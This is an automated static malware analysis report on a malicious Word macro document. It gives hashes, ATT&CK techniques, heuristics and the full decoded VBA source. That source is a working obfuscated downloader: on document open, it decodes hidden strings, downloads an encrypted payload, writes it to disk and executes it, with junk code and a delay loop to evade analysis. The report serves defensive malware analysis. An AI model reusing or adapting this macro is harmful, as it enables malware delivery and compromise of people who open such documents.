Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3326a72ea7666a9b…

MALICIOUS

Office (OOXML)

Size: 31.9 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-09-24
MD5: 7d5351864220a1128a4b6096561312d0
SHA-1: caf2be6c02394ebffdd6605c73323dd4e5951dd2
SHA-256: 3326a72ea7666a9bfae92fd05ce3ff562edafff053ea0bfb7bb1f9ba3d1f9bbd
Risk Score: 400

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information

This OOXML document contains a VBA macro designed to execute when the document is opened, as indicated by the Document_Open macro heuristic and the critical heuristic for an obfuscated auto-exec loader. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The VBA script appears to be obfuscated and likely decodes or executes a payload, consistent with the 'Deobfuscate/Decode Files or Information' technique.

Heuristics 12

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    GetObject 3, 10
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set SwvGbB0on56G = CreateObject(OSKjPtcCMdE6j(Chr(157) + Chr(149) + Chr(218) + Chr(30) + Chr(188) + Chr(102) + Chr(252) + Chr(195) + Chr(32) + Chr(209) + Chr(116) + Chr(18) + Chr(149) + Chr(91) + Chr(245) + Chr(13) + Chr(168), "PYDyPB7kA"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject 3, 10
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName RuN6PGqPh1t, 92, VbMethod, 14, 3, 37
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    IqHZePLJpKN = Environ(OSKjPtcCMdE6j(Chr(134) + Chr(236) + Chr(6) + Chr(219) + Chr(123) + Chr(223) + Chr(104), "IdExOiXbuurRfl8JM")) & "\" & S680eL5GmcJV3 & OSKjPtcCMdE6j(Chr(93) + Chr(0) + Chr(115) + Chr(210), "X98dnRg")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12439 bytes
SHA-256: 26d291ab79612f27e327a42a8edcd1f0e299215ea9dc7efe43f193ccb12fcfb1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
87 of 174 identifiers look randomly generated (e.g. 'IdExOiXbuurRfl8JM') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OSKjPtcCMdE6j(ByVal KOL3TzbwD As String, ByVal U8juuGt As String) As String
Dim POF4A6oZOYpH As Long, PIiN As Long
POF4A6oZOYpH = 70
PIiN = 68
If POF4A6oZOYpH + PIiN > 2 Then
PIiN = POF4A6oZOYpH + 7
Else
InputBox 12
End If
On Error Resume Next
Dim YdfLyn7 As Long, LseL9GUdM As Long
YdfLyn7 = 56
LseL9GUdM = 85
If YdfLyn7 + LseL9GUdM > 2 Then
LseL9GUdM = YdfLyn7 + 48
Else
InputBox 60
End If
Dim Qgp2tW1XRc(0 To 255) As Integer, Dv9WpG8 As Long, MGlrVhwFv02k6 As Long, XL5mwnTDLlB As Long, Tw1b3xXA9k() As Byte, Jq1nIcYlyu() As Byte, ArgVuwL08Y As Byte
Dim G3cnRP5jP As Long, B3OpOYBy1 As Long
G3cnRP5jP = 30
B3OpOYBy1 = 63
If G3cnRP5jP + B3OpOYBy1 > 2 Then
B3OpOYBy1 = G3cnRP5jP + 91
Else
InputBox 33
End If
Tw1b3xXA9k() = StrConv(U8juuGt, vbFromUnicode)
Dim Fl2zZQ As Long, VhSUBzJkEcK As Long
Fl2zZQ = 6
VhSUBzJkEcK = 37
If Fl2zZQ + VhSUBzJkEcK > 2 Then
VhSUBzJkEcK = Fl2zZQ + 44
Else
InputBox 49
End If
For Dv9WpG8 = 0 To 255
Qgp2tW1XRc(Dv9WpG8) = Dv9WpG8
Next Dv9WpG8
Dv9WpG8 = 0
MGlrVhwFv02k6 = 0
XL5mwnTDLlB = 0
For Dv9WpG8 = 0 To 255
MGlrVhwFv02k6 = (MGlrVhwFv02k6 + Qgp2tW1XRc(Dv9WpG8) + Tw1b3xXA9k(Dv9WpG8 Mod Len(U8juuGt))) Mod 256
ArgVuwL08Y = Qgp2tW1XRc(Dv9WpG8)
Qgp2tW1XRc(Dv9WpG8) = Qgp2tW1XRc(MGlrVhwFv02k6)
Qgp2tW1XRc(MGlrVhwFv02k6) = ArgVuwL08Y
Next Dv9WpG8
Dv9WpG8 = 0
MGlrVhwFv02k6 = 0
XL5mwnTDLlB = 0
Jq1nIcYlyu() = StrConv(KOL3TzbwD, vbFromUnicode)
For Dv9WpG8 = 0 To Len(KOL3TzbwD)
MGlrVhwFv02k6 = (MGlrVhwFv02k6 + 1) Mod 256
XL5mwnTDLlB = (XL5mwnTDLlB + Qgp2tW1XRc(MGlrVhwFv02k6)) Mod 256
ArgVuwL08Y = Qgp2tW1XRc(MGlrVhwFv02k6)
Qgp2tW1XRc(MGlrVhwFv02k6) = Qgp2tW1XRc(XL5mwnTDLlB)
Qgp2tW1XRc(XL5mwnTDLlB) = ArgVuwL08Y
Jq1nIcYlyu(Dv9WpG8) = Jq1nIcYlyu(Dv9WpG8) Xor (Qgp2tW1XRc((Qgp2tW1XRc(MGlrVhwFv02k6) + Qgp2tW1XRc(XL5mwnTDLlB)) Mod 256))
Next Dv9WpG8
Dim HbwDXb8IiAKE As Long, UJSE59WKx7 As Long
HbwDXb8IiAKE = 24
UJSE59WKx7 = 34
If HbwDXb8IiAKE + UJSE59WKx7 > 2 Then
UJSE59WKx7 = HbwDXb8IiAKE + 50
Else
InputBox 30
End If
OSKjPtcCMdE6j = StrConv(Jq1nIcYlyu, vbUnicode)
Dim PQ5lQOmMjV4O As Long, PayOeicY5V5ZC As Long
PQ5lQOmMjV4O = 3
PayOeicY5V5ZC = 46
If PQ5lQOmMjV4O + PayOeicY5V5ZC > 2 Then
PayOeicY5V5ZC = PQ5lQOmMjV4O + 15
Else
InputBox 35
End If
End Function
Sub XfQ6d01lVW()
Dim IJMFi7l5kZa As Long, GzGvJZRKtRG As Long
IJMFi7l5kZa = 45
GzGvJZRKtRG = 18
If IJMFi7l5kZa + GzGvJZRKtRG > 2 Then
GzGvJZRKtRG = IJMFi7l5kZa + 26
Else
InputBox 75
End If
GetObject 3, 10
IsError 15
If CBool(98) = True Then WALWj5a3iYn = 47
Switch 76
Reset
Load Tl81bW15Ru
Atn 62
O6yGN49go = EOF(31)
Sin 96
DateDiff "Gh14I733", 1, 41
Err.Clear
SeQg6R6lmyUY3s6G = Day(95)
IsDate 5
Join H5ShGMlGB8Kz, 31
Year 51
DateSerial 91, 17, 92
Hour 66
Month 19
KJTS00RZrA8bpmgc = Cos(10)
YjVTBvQJw2tK = CurDir
If IsMissing(61) = True Then BxWa5a = 59
If CByte(13) = True Then TnebhFxyzR9ho6 = 7711
If CCur(84) = True Then WzTtVPR6ZhqF = 9142
CallByName RuN6PGqPh1t, 92, VbMethod, 14, 3, 37
ChDrive 32
TimeSerial 75, 18, 65
TimeValue 49
MADNCH5ilmF = Fix(42)
LOF 64
Loc 97
Dim Ez1AQfpdHG As Long, Uzt0Om As Long
Ez1AQfpdHG = 51
Uzt0Om = 25
If Ez1AQfpdHG + Uzt0Om > 2 Then
Uzt0Om = Ez1AQfpdHG + 77
Else
InputBox 21
End If
End Sub
Sub Document_Open()
Dim AX61IeS9 As Long, XJ5boLgEHqvUq As Long
AX61IeS9 = 64
XJ5boLgEHqvUq = 78
If AX61IeS9 + XJ5boLgEHqvUq > 2 Then
XJ5boLgEHqvUq = AX61IeS9 + 10
Else
InputBox 61
End If
Dim Jsn9k8owxunZC8q As Long, NvBZK3zIWc As Long, GRzGFMvFAwTz5 As Long
Dim QO6ZorINUh0YxW As Long, MqK2vwpSFg As Long
QO6ZorINUh0YxW = 96
MqK2vwpSFg = 28
If QO6ZorINUh0YxW + MqK2vwpSFg > 2 Then
MqK2vwpSFg = QO6ZorINUh0YxW + 35
Else
InputBox 40
End If
Jsn9k8owxunZC8q = 985671669: NvBZK3zIWc = 0: GRzGFMvFAwTz5 = 0
Dim VTrknUphvS9Q As Long, Az0t4gJBe As Long
VTrknUphvS9Q = 71
Az0t4gJBe = 76
If VTrknUphvS9Q + Az0t4gJBe > 2 Then
Az0t4gJBe = VTrknUphvS9Q + 60
Else
InputBox 9
End If
For NvBZK3zIWc = 1 To Jsn9k8owxunZC8q
GRzGFMvFAwTz5 = GRzGFMvFAwTz5 + 1
Next NvBZK3zIWc
Dim Bfog350uASFg As Long, RggXXIVLXmXCm6uL As Long
Bfog350uASFg = 56
RggXXIVLXmXCm6uL = 75
If Bfog350uASFg + RggXXIVLXmXCm6uL > 2 Then
RggXXIVLXmXCm6uL = Bfog350uASFg + 16
Else
InputBox 42
End If
If GRzGFMvFAwTz5 = Jsn9k8owxunZC8q Then
Dim GpaLyXqhQFThTEH As Long, SOsKrSyfMiGu As Long
GpaLyXqhQFThTEH = 9
SOsKrSyfMiGu = 17
If GpaLyXqhQFThTEH + SOsKrSyfMiGu > 2 Then
SOsKrSyfMiGu = GpaLyXqhQFThTEH + 66
Else
InputBox 17
End If
CXwtya9R2HDcVRv
Dim CrCtO8nxmYwN As Long, C3vCslVbw As Long
CrCtO8nxmYwN = 83
C3vCslVbw = 41
If CrCtO8nxmYwN + C3vCslVbw > 2 Then
C3vCslVbw = CrCtO8nxmYwN + 92
Else
InputBox 65
End If
Else
Dim YhCAlhue03gy As Long, IpY As Long
YhCAlhue03gy = 28
IpY = 59
If YhCAlhue03gy + IpY > 2 Then
IpY = YhCAlhue03gy + 66
Else
InputBox 71
End If
XfQ6d01lVW
Dim N69fBeZQOx As Long, L0W8mAWuXf1e As Long
N69fBeZQOx = 11
L0W8mAWuXf1e = 1
If N69fBeZQOx + L0W8mAWuXf1e > 2 Then
L0W8mAWuXf1e = N69fBeZQOx + 57
Else
InputBox 60
End If
End If
Dim F3mPoe8fTvND1nM As Long, B3sO8rHE As Long
F3mPoe8fTvND1nM = 37
B3sO8rHE = 66
If F3mPoe8fTvND1nM + B3sO8rHE > 2 Then
B3sO8rHE = F3mPoe8fTvND1nM + 7
Else
InputBox 10
End If
End Sub
Function S680eL5GmcJV3() As String
Dim FsA4evR73T0kUYz As Long, SwA3dRkK25PxEFb As Long
FsA4evR73T0kUYz = 47
SwA3dRkK25PxEFb = 64
If FsA4evR73T0kUYz + SwA3dRkK25PxEFb > 2 Then
SwA3dRkK25PxEFb = FsA4evR73T0kUYz + 11
Else
InputBox 1
End If
Dim Qudp0Qn02DZr() As Byte, SeLIXVSU5mCfYj() As Byte, VAH8dh As Long, UQEgAoZO0eF As Long, GLDaUyLSLF9jOq23 As String, WMznZC8q As String, OIjfDSCxQ As Long
Dim VGNZmTQdrHE As Long, YEFbhc As Long
VGNZmTQdrHE = 83
YEFbhc = 80
If VGNZmTQdrHE + YEFbhc > 2 Then
YEFbhc = VGNZmTQdrHE + 89
Else
InputBox 61
End If
OIjfDSCxQ = 0
Dim Uynb32Df9zfSWFh6 As Long, RIz8B4tyYxYVtd As Long
Uynb32Df9zfSWFh6 = 70
RIz8B4tyYxYVtd = 94
If Uynb32Df9zfSWFh6 + RIz8B4tyYxYVtd > 2 Then
RIz8B4tyYxYVtd = Uynb32Df9zfSWFh6 + 48
Else
InputBox 86
End If
GtQDqLJy9NdAA3:
Dim JPH7His As Long, EDPYNrHqcppN As Long
JPH7His = 95
EDPYNrHqcppN = 45
If JPH7His + EDPYNrHqcppN > 2 Then
EDPYNrHqcppN = JPH7His + 95
Else
InputBox 18
End If
Randomize
WMznZC8q = Int(30 * Rnd)
If WMznZC8q < 4 Then GoTo GtQDqLJy9NdAA3
OIjfDSCxQ = WMznZC8q
If OIjfDSCxQ > 0& Then
Dim SoqicL2oe As Long, AhopumSNxgZEdv As Long
SoqicL2oe = 88
AhopumSNxgZEdv = 75
If SoqicL2oe + AhopumSNxgZEdv > 2 Then
AhopumSNxgZEdv = SoqicL2oe + 89
Else
InputBox 48
End If
GLDaUyLSLF9jOq23 = OSKjPtcCMdE6j(Chr(138) + Chr(30) + Chr(209) + Chr(231) + Chr(16) + Chr(217) + Chr(81) + Chr(168) + Chr(224) + Chr(199), "DFbhcc4VoI")
Randomize
Qudp0Qn02DZr = GLDaUyLSLF9jOq23
VAH8dh = Len(GLDaUyLSLF9jOq23) - 1&
OIjfDSCxQ = (OIjfDSCxQ * 2&) - 1&
ReDim SeLIXVSU5mCfYj(OIjfDSCxQ) As Byte
Dim TkJEnaQ9RpAt2Op9n As Long, W9NPAQVShag As Long
TkJEnaQ9RpAt2Op9n = 29
W9NPAQVShag = 81
If TkJEnaQ9RpAt2Op9n + W9NPAQVShag > 2 Then
W9NPAQVShag = TkJEnaQ9RpAt2Op9n + 97
Else
InputBox 22
End If
For UQEgAoZO0eF = 0& To OIjfDSCxQ Step 2&
SeLIXVSU5mCfYj(UQEgAoZO0eF) = Qudp0Qn02DZr(CLng(VAH8dh * Rnd) * 2&)
Next
Dim Payf5HA As Long, TZ6TFMDw2Q0 As Long
Payf5HA = 50
TZ6TFMDw2Q0 = 17
If Payf5HA + TZ6TFMDw2Q0 > 2 Then
TZ6TFMDw2Q0 = Payf5HA + 17
Else
InputBox 92
End If
End If
Dim PSF26mT As Long, BzOndDgM0lxw As Long
PSF26mT = 69
BzOndDgM0lxw = 59
If PSF26mT + BzOndDgM0lxw > 2 Then
BzOndDgM0lxw = PSF26mT + 16
Else
InputBox 20
End If
S680eL5GmcJV3 = SeLIXVSU5mCfYj
Dim RWjOa8XqGD9 As Long, BJ935VzW6 As Long
RWjOa8XqGD9 = 75
BJ935VzW6 = 68
If RWjOa8XqGD9 + BJ935VzW6 > 2 Then
BJ935VzW6 = RWjOa8XqGD9 + 90
Else
InputBox 96
End If
End Function
Sub L4HKO4q4b1(VnFa35qS As Long)
Dim Pkrx6EPe3Vkvc6S As Long, YCfqQNNAu As Long
Pkrx6EPe3Vkvc6S = 89
YCfqQNNAu = 72
If Pkrx6EPe3Vkvc6S + YCfqQNNAu > 2 Then
YCfqQNNAu = Pkrx6EPe3Vkvc6S + 98
Else
InputBox 19
End If
Dim WAbFKEe As Long
Dim O0tiCO As Long, DboMV As Long
O0tiCO = 58
DboMV = 55
If O0tiCO + DboMV > 2 Then
DboMV = O0tiCO + 64
Else
InputBox 36
End If
WAbFKEe = Timer + VnFa35qS
Do While Timer < WAbFKEe
DoEvents
Loop
Dim Pq1BkBD2 As Long, OeJu23xo As Long
Pq1BkBD2 = 97
OeJu23xo = 36
If Pq1BkBD2 + OeJu23xo > 2 Then
OeJu23xo = Pq1BkBD2 + 47
Else
InputBox 62
End If
End Sub
Sub CXwtya9R2HDcVRv()
Dim FPDT As Long, LqmSrzWOo7N As Long
FPDT = 27
LqmSrzWOo7N = 75
If FPDT + LqmSrzWOo7N > 2 Then
LqmSrzWOo7N = FPDT + 76
Else
InputBox 28
End If
Dim IqHZePLJpKN As String, SwvGbB0on56G As Object, YOcpKu4FN As Integer
Dim SK6Fc As Long, QUC0vmluDE As Long
SK6Fc = 58
QUC0vmluDE = 27
If SK6Fc + QUC0vmluDE > 2 Then
QUC0vmluDE = SK6Fc + 48
Else
InputBox 59
End If
IqHZePLJpKN = Environ(OSKjPtcCMdE6j(Chr(134) + Chr(236) + Chr(6) + Chr(219) + Chr(123) + Chr(223) + Chr(104), "IdExOiXbuurRfl8JM")) & "\" & S680eL5GmcJV3 & OSKjPtcCMdE6j(Chr(93) + Chr(0) + Chr(115) + Chr(210), "X98dnRg")
Dim Lwh9hORflM As Long, UeFK9KofAjEl1s As Long
Lwh9hORflM = 18
UeFK9KofAjEl1s = 13
If Lwh9hORflM + UeFK9KofAjEl1s > 2 Then
UeFK9KofAjEl1s = Lwh9hORflM + 2
Else
InputBox 36
End If
Set SwvGbB0on56G = CreateObject(OSKjPtcCMdE6j(Chr(157) + Chr(149) + Chr(218) + Chr(30) + Chr(188) + Chr(102) + Chr(252) + Chr(195) + Chr(32) + Chr(209) + Chr(116) + Chr(18) + Chr(149) + Chr(91) + Chr(245) + Chr(13) + Chr(168), "PYDyPB7kA"))
Dim CrUCjmCKSVKMRYK As Long, I9yC9KuEh1F3zEo As Long
CrUCjmCKSVKMRYK = 55
I9yC9KuEh1F3zEo = 29
If CrUCjmCKSVKMRYK + I9yC9KuEh1F3zEo > 2 Then
I9yC9KuEh1F3zEo = CrUCjmCKSVKMRYK + 80
Else
InputBox 24
End If
SwvGbB0on56G.Open OSKjPtcCMdE6j(Chr(49) + Chr(102) + Chr(76), "JpxGsKLacJu"), OSKjPtcCMdE6j(Chr(141) + Chr(22) + Chr(128) + Chr(226) + Chr(57) + Chr(185) + Chr(167) + Chr(66) + Chr(66) + Chr(243) + Chr(16) + Chr(127) + Chr(54) + Chr(108) + Chr(179) + Chr(101) + Chr(123) + Chr(162) + Chr(153) + Chr(218) + Chr(127) + Chr(70) + Chr(246) + Chr(192) + Chr(158) + Chr(180) + Chr(84), "LliA27PvNSHbqS"), False
Dim JYGWNxZ As Long, HcVcCnhMawmmcG As Long
JYGWNxZ = 16
HcVcCnhMawmmcG = 91
If JYGWNxZ + HcVcCnhMawmmcG > 2 Then
HcVcCnhMawmmcG = JYGWNxZ + 91
Else
InputBox 44
End If
SwvGbB0on56G.setRequestHeader OSKjPtcCMdE6j(Chr(4) + Chr(35) + Chr(243) + Chr(246) + Chr(24) + Chr(220) + Chr(9) + Chr(203) + Chr(252) + Chr(227), "KIFY5MMYDGkJlS"), OSKjPtcCMdE6j(Chr(197) + Chr(75) + Chr(53) + Chr(86) + Chr(108) + Chr(157) + Chr(91) + Chr(101) + Chr(252) + Chr(193) + Chr(190), "IXNI9u8cZk1YRp8e1")
SwvGbB0on56G.send
If SwvGbB0on56G.readyState = 4 And SwvGbB0on56G.Status = 200 Then
Dim K1ayon9AA As Long, HWdxxXVo As Long
K1ayon9AA = 21
HWdxxXVo = 31
If K1ayon9AA + HWdxxXVo > 2 Then
HWdxxXVo = K1ayon9AA + 47
Else
InputBox 27
End If
YOcpKu4FN = FreeFile
Open IqHZePLJpKN For Binary Access Write Lock Write As #YOcpKu4FN
Put #YOcpKu4FN, , OSKjPtcCMdE6j(StrConv(SwvGbB0on56G.ResponseBody, vbUnicode), OSKjPtcCMdE6j(Chr(227) + Chr(134) + Chr(117) + Chr(46) + Chr(111) + Chr(20) + Chr(236) + Chr(75) + Chr(79), "SQj4RQbQ"))
Close #YOcpKu4FN
Dim XhORflMe1BJlu4C As Long, BJAwXU1PY As Long
XhORflMe1BJlu4C = 31
BJAwXU1PY = 74
If XhORflMe1BJlu4C + BJAwXU1PY > 2 Then
BJAwXU1PY = XhORflMe1BJlu4C + 43
Else
InputBox 64
End If
L4HKO4q4b1 1
Dim Wd86Lg7QmKY As Long, ENP3MK As Long
Wd86Lg7QmKY = 29
ENP3MK = 53
If Wd86Lg7QmKY + ENP3MK > 2 Then
ENP3MK = Wd86Lg7QmKY + 8
Else
InputBox 45
End If
CreateObject(OSKjPtcCMdE6j(Chr(129) + Chr(215) + Chr(193) + Chr(38) + Chr(218) + Chr(115) + Chr(35) + Chr(90) + Chr(159) + Chr(83) + Chr(252) + Chr(0) + Chr(211), "F1eQ91DNjdd")).exec """" & IqHZePLJpKN & """"
Dim BP2bCZaL0s As Long, TsROzYqU As Long
BP2bCZaL0s = 45
TsROzYqU = 33
If BP2bCZaL0s + TsROzYqU > 2 Then
TsROzYqU = BP2bCZaL0s + 68
Else
InputBox 62
End If
End If
Dim W1LBosA As Long, O0vbeO As Long
W1LBosA = 38
O0vbeO = 94
If W1LBosA + O0vbeO > 2 Then
O0vbeO = W1LBosA + 97
Else
InputBox 60
End If
Set SwvGbB0on56G = Nothing
Dim B1fJaNDOc4z As Long, GRVM8W8ABm4fN As Long
B1fJaNDOc4z = 91
GRVM8W8ABm4fN = 79
If B1fJaNDOc4z + GRVM8W8ABm4fN > 2 Then
GRVM8W8ABm4fN = B1fJaNDOc4z + 15
Else
InputBox 10
End If
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 32256 bytes
SHA-256: 17e6c16aa3ad2d96d1eba2512463e475ab89c415074577e2847204a4b87c8dac
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely